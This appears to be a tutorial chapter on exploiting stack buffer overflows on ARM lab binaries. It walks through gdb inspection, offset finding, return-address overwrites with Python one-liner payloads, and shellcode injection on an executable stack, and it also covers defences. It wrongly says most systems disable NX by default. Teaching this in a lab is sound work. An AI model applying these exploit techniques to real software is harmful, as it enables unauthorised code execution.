Introduction to stack buffer overflows
Let's now start our exploitation side.
We will start off with stack-based buffer overflows. Before diving into this section, make sure you are knowledgeable about the previous chapters.
Buffer
Before talking about buffer overflow. Let's explain what's is a buffer is.
A buffer is a temporary storage space for holding the data in the memory.
For example,
char a[5];
'a' can be called a buffer that can store 5 characters. Simply speaking it's a character array that can store 5 characters.
Buffer overflow
Now, what's a buffer overflow?
Buffer overflow as the name suggests is the vulnerability that occurs when the buffer is overflowed or filled with bytes more than it can accommodate.
char a[5];
Above we see a buffer that holds 5 characters. But what happens when we try to insert more than 5 characters? it overflows.
So where does the overflow happens?
Of course, In the memory. But if you are asking more specifically.
it depends. The overflow can happen at the stack or the heap. But in this context, we are only focusing on stack-based overflows. So the overflow is happening on the stack. The return address and the space for our local variables are allocated on the stack.
Buffer overflows are very serious vulnerabilities that can crash the programs or even can be used to execute arbitrary code. This vulnerability is still relevant today. So it's very important to have a thorough understanding of this.
Now understand this more by using examples.
A simple bof
I will be demonstrating this in my azeria labs VM.
Compile this using gcc.
gcc bof.c -o bof
Now let's run it and see the output.
The program is working normally.
As we can see it's a simple program. it has two variables.
One is a buffer that can store 5 characters, Another is an integer variable that is filled with the value 15.
It prints two messages on the screen. The second one asks to enter some input.
The program is reading the input from the user using the gets function and writes that to the buffer called 'buf'.
Finally, it prints the value of the integer variable which is 15.
It's a very small program. what could possibly go wrong with this right? Let's see.
Let's again run the program but with a longer input. we know that the buffer can only hold a maximum of 5 characters. So what will happen if we input more?
We can see in the output that the value has been changed. it was supposed to print 15 but instead, it shows the value 65. So what happened here?
We know that our buffer 'buf' only has the space for holding 5 characters but we provided 9 characters. As a result, the buffer overflowed into the adjacent memory location which was the space used by the variable 'a' to store the value 15 was overwritten by the "A" s provided as input.
So the value 65 is the decimal value for the character 'A'. Let's see that.
Let's use the calculator and confirm this.
The hex equivalent for decimal 65 is 41. The value 41 is the hex representation for the ASCII character "A" which was our input.
Let's run the program again and add some more input.
The value of 'a' is now changed to a very strange value and the program is also printing "Segmentation fault" on the screen.
What is a Segmentation fault?
Segmentation fault happens when the program tries to do read and write operations in a read-only location in memory or the program is trying to access an invalid memory space. we will come back to this later.
Now, this value 1094795585 is actually our "A"s. we can confirm them by using our calculator.
Converting the hex into ASCII gives us 4 "A"s which is of size four bytes. (Size of an integer is four bytes).
Vulnerable C functions
We have confirmed that the buffer has overflowed and overwrote our adjacent data. But what is the actual reason that causes this to happen?
Our input right?
But who let the attacker include such large input?
The only place which the attacker can control is the input. And this input is dealt with using the gets() function.
Yes, you have guessed it right. The culprit here is the gets function. The reason we are allowed input such a large string is because of the gets() function.
The gets() doesn't have any bound checks. That's why we were able to enter many characters as possible. So when writing your programs try to avoid using the gets() function instead use fgets() to accept inputs.
Another example of a vulnerable c in-built function is strcpy().it is copied to copy strings. Similarly to gets() this function also doesn't do any bound checking. As a result, we can copy a large string to a buffer more than it can actually hold, which can overflow the buffer.
Memory layout
Now let's visually see the memory layout for understanding better.
There are two local variables on the stack.
This is the case in normal execution. what I meant by normal execution is that when we provide safe input.
Let's see what happens when we input characters more than the buffer can accommodate.
So the "A" overflowed and filled the adjacent memory which was allocated to the variable 'a' for storing the integer value 15. As a result, the value 15 in the integer variable 'a' was overwritten with the "A"s we provided.
The size of the integer is 4 bytes. So in the output, the four "A"s (41414141 in hex) which are filled in place of the integer variable 'a' are calculated as 4 bytes (Size of a character: 1 byte ) and are interpreted as a decimal value: 1094795585.
Now let's see the memory layout live using gdb too.
Load the program into gdb.
gdb ./bof1
Now put a breakpoint at the last instruction of the main function.
0x000104bc <+64>: pop {r11, pc}
Now run the program using the 'r' command.
Let's provide a safe input so that we can see that layout in normal execution. I will put 4 "A"s as input.
Once we hit our breakpoint. Use the examine command to inspect the memory layout.
We see both our buffer and variable 'a'. The value 15 in hex is f. So that is our variable 'a'. Note that the buffer is placed at a lower address than the variable 'a'. (The stack grows from high memory to low memory)
Now let's see what happens when we overflow our buffer.
We can see that the memory location that had the value 0x0000000f (15) is overwritten by our "A"s.
This is what buffer overflow in our memory looks like.
Now let's do a simple challenge.
Challenge 0x1
Compile this source code using gcc.
gcc challenge1.c -o challenge1
So the challenge is to get the shell by overwriting the 'pass' variable with the value 0x42434241.
Try it out yourself first.
if you haven't figured it out. Let's do a walkthrough of the solution.
Solution 0x1
As we look at the source code we can see that the variable 'pass' is initialized with the value 1234. We have a buffer named 'buf' which stores a maximum of 10 characters.
And finally, we have our vulnerable function 'gets' which writes data into the buffer. So we can confirm that the program has a buffer overflow vulnerability.
So in order to win the challenge we need to overflow the buffer and rewrite the target in the 'pass' variable to 0x42434241.
Let's run the program and check if our thesis is right.
When the input is within limits the program exits normally. In this case, the output of the "pass" variable is 4d2 which converts to 1234 in decimal.
In the second case, we provided input more than the buffer can hold and this overflowed the buffer and overwrote the "pass" variable.
As we can see the output of the "pass" variable is 0x41414141 which corresponds to our input "AAAA".
So what we need to do is to overwrite the value of the "pass" variable with 1234 to 0x42434241. Let's convert the hex to characters and let's input that.
So 0x42434241 is "BCBA". But we need to pass this in the reverse order "ABCB" (little-endian) and rewrite the "pass" variable to execute the "system" function.
Now let's pass these characters through the input. But we need to identify which part of the input overwrites the "pass" variable.
Let's analyze the example diagram below.
Our input is 9"A"s and 4 "B"s. As the picture depicts, to overflow the buffer we need more than 9 characters. So we need to fill these 9 characters first, in order to overwrite the "pass" variable. Only the characters after the 9th position (which is the 9th character ) in the input overwrite the "pass" variable.
So when we usually do buffer overflows we need to find out the certain positions in the input to know what part of the input will reside at a specific location in the stack.
For this, we can brute-force and find out the location which is very time-consuming. Another simple way to do this is to send a unique pattern as input. There are third-party tools for this online.
For solving this problem. I will use the first website.
We can copy this pattern of 200 characters and provide this as input for the program.
Let's copy the value of the "pass" and paste this into the website for knowing its position.
So it will take 12 characters to overflow the buffer and reach the "pass" variable and the 13 th character and onwards will start overwriting the "pass" variable.
So, We can send 12 junk characters in our input to reach the "pass" variable and then start overwriting the "pass" variable with "ABCB" to execute the system function.
Let's try that.
it overwrote the "pass" variable with the value 0x42434241 and we got our shell.
Redirecting the execution
Let's come to the segmentation fault.
As we learned in the stack section when a function is called the return address will be copied to the "LR" register. Then it will be pushed into the stack at the beginning of the function so that the "LR" register can be reused and after completing all the instructions in the function it will be popped back at the end of the function.
When we were playing with the above binary. we saw the program crashed and giving as a "segmentation fault".
Why did that error occur?
"Segmentation fault happens when the program tries to do read and write operations in a read-only location in memory or the program is trying to access an invalid memory space. we will come back to this later"
So what's the invalid address here? Let's figure this out by working through a challenge.
Compile this using gcc
We can see in this program, it is using strcpy() which is a vulnerable function that doesn't do any bound checks. So we can overflow the buffer.
Let's try that.
As expected the program crashed.
it also prints out the "segmentation fault" message. So let's inspect that using gdb.
Load it into gdb and run it.
Gdb shows the reason for the crash which is a segmentation fault or SIGSEGV.
Gdb also says "Cannot disassemble from $PC". As we know pc (program counter) points to the next instruction to be executed. The pc executes the instructions from the memory address it's pointing to.
if we look at pc here it's referring to the address 0x42424242 which is our input "BBBB".So we can conclude that our input also overwrote the pc. When pc tries to resolve the instructions from the address 0x42424242 it crashes because it is not a valid address. This is why our program crashes.
Let's see how this pc gets overwritten.
Load the program into gdb and put a bp at the branch instruction to the "vulnerable" function.
Run the program with our large input.
gef> r AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
it hit our bp.
Now inspect the "LR" register it will contain the address of the next instruction in the main function.
0x00010540 <+68>: mov r0, #0
Let's step into the vulnerable function using the "si" command.
Now we are inside the vulnerable function and "lr" holds the return address. The first push instruction will push the r11 and lr registers into the stack. We can execute this instruction by stepping through it.
si
As expected both r11 and lr are pushed into the stack. Put a bp at the pop instruction of the vulnerable function.
Let's continue our execution using the "c" command until it hits the bp.
We can see that our stack is overwritten by our "A"s. Now, this pop instruction will remove the top two values from the stack and copies them into r11 and pc. if we didn't overflow the buffer, the correct values would get popped into the registers, and execution would have continued normally.
As a result of the overflow, both r11 and pc will point to 0x41414141.
Let's continue the execution to confirm this.
But If we try to step the instruction it won't work. So remove the breakpoints using
delete breakpoints
Now continue the execution using the "c" command.
The pc and the r11 register are now filled with the "AAAA". But pc shows "0x41414140". The last byte is showing 40 instead of 41. This is because when the LSB of the address is 1 it will trigger the thumb mode (Thumb mode uses odd addresses). As 4 "A" s represent 41414141 the LSB is 1, this will change the state to thumb mode. if we look at the cpsr "THUMB" mode is enabled. We don't need to bother about it because we won't be working in thumb mode.
So this is how pc gets overwritten.
To complete this challenge, we can overflow the buffer and overwrite the return address with the address of the win() function.
First, let's find out the position of the input which overwrites the pc using a pattern generator.
Load the binary into gdb and use the pattern as the argument.
Now the program crashed. Let's copy the value from pc. Please note that the last byte should be 41 according to our input but it's showing 40 due to thumb mode. So when we copy this to find the offset, change the 40 to 41.
So we need more than 24 characters to overflow the buffer and reach to the pc. we can overwrite pc from the 25th character and onwards.
Let's confirm this. For this, I will write a simple python one-liner and provide this as an argument with the run command inside gdb.
gef> r $(python -c 'print("A" * 24 + "BBBB")')
As expected the four characters after the 24th character overwrite the pc. Next, we need to find the address of the win() function.
We can use the "disass" command to get the address of the win() function.
The address of the win function is 0x000104d8.
Now we can provide this address in the one-liner script as input. But we can't directly provide this address, like strings. we should provide this as a hex byte.
For this, we use the format below.
\xeb\x2a //example
So for our address, it should be like this.
\xd8\x04\x01\x00
Don't forget to reverse the order as it uses little-endian memory format.
The final script will be.
gef> r $(python -c 'print("A" * 24 + "\xd8\x04\x01\x00")')
Let's execute this and if we get a shell.
it worked perfectly. Let's run this outside gdb.
Make sure alsr is off.
it is working fine. So this is how you can redirect the execution of the program by taking control of the pc register. if we can overwrite the return address we can control the pc.
Protection mechanisms
As we know buffer overflow is a very critical vulnerability there are several protection mechanisms implemented by the OS to prevent this.
Address space layout randomization (ASLR): ASLR is a security feature that randomizes the data locations in the memory. Exploiting a buffer overflow requires the attacker to know or guess the position of processes and functions in memory. This makes it more difficult for an attacker to predict the location of a buffer and successfully execute arbitrary code. For example, In the last Challenge, in order to solve it we required the address of the win() function. if we had enabled ALSR, the address of the win() function would change during every time of its execution. As a result, the address at one instance will become invalid on the next execution.
Non-executable memory/ Data Execution Prevention: NX/DEP prevents executing code on the stack. it makes a memory region non-executable. if there is a buffer overflow vulnerability the attacker can fill the stack with malicious code and execute it. But if NX is enabled the attacker won't be able to execute the code. When we did our exercises we purposefully made the stack executable so that we could learn without bothering about it. By default, the stack is non-executable meaning that we can't execute any code in the stack. This is why we specified "-z execstack" during compilation. This makes the stack executable.
Stack canaries or security cookies: They are random values placed between the buffer and the return address. At end of the execution, the program checks if the stack canary is overwritten by any other value. if that's the case, the program terminates thus by preventing the attacker to take control of the pc through overwritten return address.
Similarly, the programmer can prevent buffer overflows by checking user input to ensure that it is of the expected format and size. The programmer should also check the size of the input data before writing it into a buffer This can prevent an attacker from overflowing the buffer by limiting the amount of data that can be written to the buffer.
Introduction to Shellcode
In the above challenge, we tried to exploit the buffer overflow vulnerability to redirect the execution to specific functions in the program itself. So that was solely a challenge for helping you learn the concept through a hands-on experience. In real-world applications, we won't have such useful functions to exploit. So for example, if I need to get a shell we need to find such functions that land us a shell.
Here is where the shellcode comes into play.
So what is shellcode?
Shellcode is a small piece of code that is written in assembly language and is used during exploitation. An attacker can inject shellcode directly into a running process or into the memory of a program that is about to be executed by taking advantage of vulnerabilities like buffer overflows. The attacker can execute malicious commands, spawn a shell, extract sensitive data, etc. As they are written in machine language, they are difficult to read and understand.shellcode is usually stored as a sequence of bytes and is often represented in hexadecimal form.
When there are no useful functions in the binary for an attacker to take advantage we can inject the shellcode into the buffer and can try to execute that. But for that, the NX should be disabled. Most of the systems have NX disabled by default.
You can write your own shellcode if you have enough knowledge of assembly. Learning shellcode coding can be a good advantage if you are doing low-level exploitations. Using someone's shellcode is risky Unless it's a trusted source so it's always better to write our own shellcode. if you want to learn to write shellcode for ARM32.
Check out azerialabs shellcode tutorials : https://azeria-labs.com/writing-arm-shellcode/
https://shell-storm.org/shellcode/index.html is a great place to find shellcodes. They contain shellcodes for different architectures like MIPS, ARM,x86, etc
Let's try injecting the shell code in the above program.
First, we need to compile the source code again without the NX bit.
Compile it with gcc and disable the NX.
gcc challenge2.c -z execstack -o challenge2.
The "-z execstack" makes our stack executable. We can only execute the shellcode if our stack has executable permissions.
Before tinkering with the binary, there are some things that we should keep in our mind about the shellcode.
The shellcode should be small enough to fit th available buffer or space.
it shouldn't contain any characters that break the shellcode. They are also called bad characters. For example, if we are exploiting a buffer overflow by taking advantage of the vulnerable "strcpy()" function, our shellcode shouldn't contain any null bytes ("\0"). Because the strcpy() function stops copying when it encounters a "\0" (null terminator) Because the null terminator represents the end of the string. Similarly, there are other bad characters like "0x0A" (New line). If these characters are encountered in the shellcode it breaks and the shellcode won't work. This depends on the function used in the program.
You should find an appropriate memory location to place the shellcode.
We have two approaches to placing the shellcode code in our exploit string.
First approach
We can provide the shellcode before overwriting the pc. we can place the shellcode in the place of junk that we used to overflow to overwrite pc. But we should confirm if there is enough space to fit the source. if it has enough space we can use the shellcode to overflow the buffer and overwrite the pc with starting address of the placed shellcode
Let me show a pictorial representation with an example.
We have a buffer that has a maximum size of 20 bytes. if we provide more characters than 20 .it will start overwriting pc. So we must fit the shellcode in that 20 bytes. Then provide the starting address of the shellcode to pc. Thus pc will start executing the shellcode placed at the memory location.
This approach is risky if the space before overwriting the pc is small and this won't work if the shellcode is too large.
Second approach
The second approach is to send the shellcode after overwriting pc. This approach is safe because we won't have many issues with the size constraint of the shellcode. We will be using this approach because the shell code we are going to use won't fit in the buffer. it is larger than the available buffer space. Firstly we fill up the buffer with junk characters and overwrite the pc with the address of the shellcode that is passed.
Let's see the pictorial representation with the same example used in approach one using this approach.
Now Let's start writing our exploit script.
I will create a python file for writing for the exploit.
As we are using the previous example, we know that we need 24 junk characters to reach the return address and overwrite it.
Now let's declare a variable to store the shellcode.
We will use a shellcode from the above-mentioned post. This is a very simple shellcode that can give us a shell by calling the system function. We will look into system function in the next chapter.
So let's copy this into the exploit script.
Now we need to find a location for placing the shellcode. For this, we must examine the memory locations using GDB.
Let's load the program into gdb and put a breakpoint at the last pop instruction of the vulnerable function.
pi@raspberrypi:~/practice $ gdb ./challenge2
Run the program using the "r" command. But for the input (input argument), we must provide a long string so that we can see the memory locations overwritten by our input. Then we can select a suitable memory location after examing the memory.
First, send 24 "A"s and overwrite the pc with "BBBB" so that we can identify the pc from our large "A"s and send 50 more "A"s after overwriting the pc.
Let's do that.
We hit our breakpoint. Let's inspect the memory using the examine command to find our suitable memory location.
We can see our exploit string in the stack layout. Now Let's choose a location for placing the shellcode. The easiest memory location to place the shellcode in the location just after "BBBB" that overwrites the pc.
So we can select the location: 0xbefff1f0. Now let's update our exploit script.
So we entered the address of the memory location: 0xbefff1f0 in little-endian format and finally used the print() function to output the exploit string. We see the order of variables used in the print() function.
junk: Overflows and fills the buffer with "A"s.
adr : address of the shellcode. This overwrites the pc
shellcode: The shellcode that we are injecting
Let's run this exploit outside gdb. Make sure your alsr is off.
As expected the shellcode worked and we got our shell.
We can also place the shellcode at a different location but we would be required to fill in junk characters to reach that distance. Some people use something called "nopsled" to add padding to the shellcode.
NOP stands for No operation. The nopsleds are instructions that don't affect the registers/memory. it does nothing when it is executed. They just simply perform a reductant operation and passes the execution to the next instruction. An example of nopsled is
mov r1,r1
it won't affect the r1 register. it is simply moving the same value in the r1 register into r1 again. As these won't affect our shellcode we can use these as padding or as placeholders.
We can use "\xe1\xa0\x10\x01" hex bytes to represent "mov r1,r1".
Try adding this padding in the shellcode and see if it works. Try this out as an exercise.
Conclusion
In this section we discussed about buffer overflows. We looked how buffer overflows occurs and how can we take advantage overflows to get control over the execution. We also learned to redirect the execution of a program by exploiting buffer overflows. Lastly we dicussed about the protection machanisms implemented to prevent buffer overflows.
Last updated